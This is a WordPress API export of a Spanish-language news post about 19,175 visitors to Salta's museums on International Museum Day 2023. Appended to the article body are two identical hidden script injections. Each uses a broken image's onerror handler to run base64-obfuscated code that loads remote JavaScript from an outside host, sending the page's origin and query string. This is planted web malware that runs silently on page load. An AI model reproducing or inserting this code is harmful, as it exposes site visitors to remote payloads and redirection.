{"id":2661,"date":"2023-05-22T14:20:19","date_gmt":"2023-05-22T17:20:19","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2661"},"modified":"2025-08-14T00:16:25","modified_gmt":"2025-08-14T03:16:25","slug":"19-175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2661","title":{"rendered":"19.175 visitantes en el D\u00eda Internacional de los Museos 2023 en Salta"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#970b2e\"><em>M\u00e1s de 19 mil visitantes, entre salte\u00f1os, salte\u00f1as y turistas, recorrieron museos de toda la provincia en el marco de la celebraci\u00f3n del D\u00eda internacional de los Museos (DIM) que se realiz\u00f3 este s\u00e1bado 20 de mayo.<\/em><\/h3>\n\n\n\n<p>En nuestra provincia, cada vez m\u00e1s personas se acercan a los museos. La jornada 2023 del D\u00eda Internacional de los Museos lo dej\u00f3 demostrado ya que registr\u00f3 un incremento de visitantes respecto a ediciones anteriores.<\/p>\n\n\n\n<p>Por convocatoria del Gobierno de la Provincia de Salta, a trav\u00e9s de la Secretar\u00eda de Cultura, 27 museos provinciales, nacionales, municipales y privados, se sumaron a este evento internacional que cont\u00f3 con m\u00e1s de 50 actividades gratuitas destinadas a toda la familia.<\/p>\n\n\n\n<p>En esta d\u00e9cimo quinta edici\u00f3n, 19.175 visitantes disfrutaron de una nutrida programaci\u00f3n bajo el lema \u201cMuseos, sostenibilidad y bienestar\u201d, instituido por el ICOM.<\/p>\n\n\n\n<p>En esta l\u00ednea, el p\u00fablico disfrut\u00f3 de un d\u00eda diferente, en espacios de contenci\u00f3n, aprendizaje y recreaci\u00f3n, conociendo m\u00e1s el patrimonio art\u00edstico, natural y cultural de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"907\" height=\"600\" data-id=\"2663\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3523-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta.jpg\" alt=\"\" class=\"wp-image-2663\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3523-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta.jpg 907w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3523-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-300x198.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3523-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-768x508.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3523-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-696x460.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3523-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-635x420.jpg 635w\" sizes=\"(max-width: 907px) 100vw, 907px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"907\" height=\"600\" data-id=\"2664\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3524-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta.jpg\" alt=\"\" class=\"wp-image-2664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3524-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta.jpg 907w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3524-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-300x198.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3524-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-768x508.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3524-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-696x460.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3524-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-635x420.jpg 635w\" sizes=\"(max-width: 907px) 100vw, 907px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"907\" height=\"600\" data-id=\"2662\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3525-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta.jpg\" alt=\"\" class=\"wp-image-2662\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3525-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta.jpg 907w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3525-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-300x198.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3525-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-768x508.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3525-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-696x460.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/05\/3525-19175-visitantes-en-el-dia-internacional-de-los-museos-2023-en-salta-635x420.jpg 635w\" sizes=\"(max-width: 907px) 100vw, 907px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Hubo caminatas y charlas relacionadas a la sostenibilidad y el bienestar, muestras y visitas guiadas especiales, pintura pavimental en acci\u00f3n por el clima, stands e informaci\u00f3n sobre alimentaci\u00f3n saludable, espacios de yoga y relajaci\u00f3n, relatos orales, espect\u00e1culos de danza, talleres, m\u00fasica en vivo, maquillaje art\u00edstico, un planetario, arte en vivo a cargo de&nbsp;<strong>Felipe Catal\u00e1n<\/strong>, t\u00edteres, actividades recreativas para ni\u00f1os y mucho m\u00e1s.<\/p>\n\n\n\n<p>Los museos abrieron sus puertas de 10 a 20, horario en que p\u00fablico de todas las edades poblaron sus salas consultando la programaci\u00f3n en sus celulares, para no perderse sus opciones preferidas.<\/p>\n\n\n\n<p>El secretario de Cultura,&nbsp;<strong>Diego Ashur<\/strong>, destac\u00f3 la gran participaci\u00f3n de j\u00f3venes en esta fecha, y agreg\u00f3: \u201cEsta gesti\u00f3n de gobierno tiene el objetivo de difundir nuestro valioso patrimonio y acercar cada vez m\u00e1s gente a los museos, estos espacios que son de todos y que permiten reconocernos en nuestra historia, diversidad e identidad. Para ello realizamos un fuerte trabajo que evidentemente rinde sus frutos\u201d.<\/p>\n\n\n\n<p>Desde la Secretar\u00eda de Cultura celebramos la gran afluencia de p\u00fablico y resaltamos la labor de todos los museos adheridos, instituciones permiten entender y vivenciar el patrimonio, cuidarlo y preservarlo para el futuro.<\/p>\n\n\n\n<p>A lo largo de los a\u00f1os, y gracias al trabajo y compromiso sostenidos en el \u00e1mbito del patrimonio cultural, el D\u00eda Internacional de los Museos se ha instalado en la agenda anual de los salte\u00f1os y salte\u00f1as y turistas.&nbsp;<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>M\u00e1s de 19 mil visitantes, entre salte\u00f1os, salte\u00f1as y turistas, recorrieron museos de toda la provincia en el marco de la celebraci\u00f3n del D\u00eda internacional de los Museos (DIM) que se realiz\u00f3 este s\u00e1bado 20 de mayo. En nuestra provincia, cada vez m\u00e1s personas se acercan a los museos. La jornada 2023 del D\u00eda Internacional [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2665,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-2661","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2661"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2661"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2661\/revisions"}],"predecessor-version":[{"id":7077,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2661\/revisions\/7077"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2665"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2661"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2661"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2661"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}